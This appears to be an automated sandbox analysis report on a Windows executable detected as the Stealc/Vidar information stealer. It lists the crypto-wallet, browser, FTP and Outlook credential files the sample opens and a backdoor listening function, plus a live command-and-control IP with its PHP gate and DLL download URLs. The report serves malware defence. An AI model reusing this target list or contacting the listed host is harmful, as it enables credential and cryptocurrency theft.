Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystoreF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json2
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003DAB000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystoreF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: ckstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003DA1000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: MultiDoge
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystoreF
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1939639884.0000000001D7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1940177043.0000000003D73000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1940177043.0000000003D18000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1939639884.0000000001D51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: 4c469e2cf403fea6249e835ddce23de2.exe PID: 6900, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_00A02FE0 WSASocketW,_memset,htonl,htons,bind,__beginthreadex, 0_2_00A02FE0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C880C40 sqlite3_bind_zeroblob, 0_2_6C880C40
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C880D60 sqlite3_bind_parameter_name, 0_2_6C880D60
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7A8EA0 sqlite3_clear_bindings, 0_2_6C7A8EA0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C880B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C880B40
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7A6410 bind,WSAGetLastError, 0_2_6C7A6410
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.200.148.113
 unknown Seychelles
328608 Africa-on-Cloud-ASZA true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.200.148.113/2a5dc88bed850cdd/msvcp140.dll true
    		unknown
    http://45.200.148.113/2a5dc88bed850cdd/freebl3.dll true
      		unknown
      http://45.200.148.113/2a5dc88bed850cdd/sqlite3.dll true
        		unknown
        http://45.200.148.113/2a5dc88bed850cdd/mozglue.dll true
          		unknown
          http://45.200.148.113/ true
            		unknown
            http://45.200.148.113/2a5dc88bed850cdd/vcruntime140.dll true
              		unknown
              http://45.200.148.113/2a5dc88bed850cdd/softokn3.dll true
                		unknown
                http://45.200.148.113/0a616124ff2f2b69.php true
                  		unknown
                  http://45.200.148.113/2a5dc88bed850cdd/nss3.dll true
                    		unknown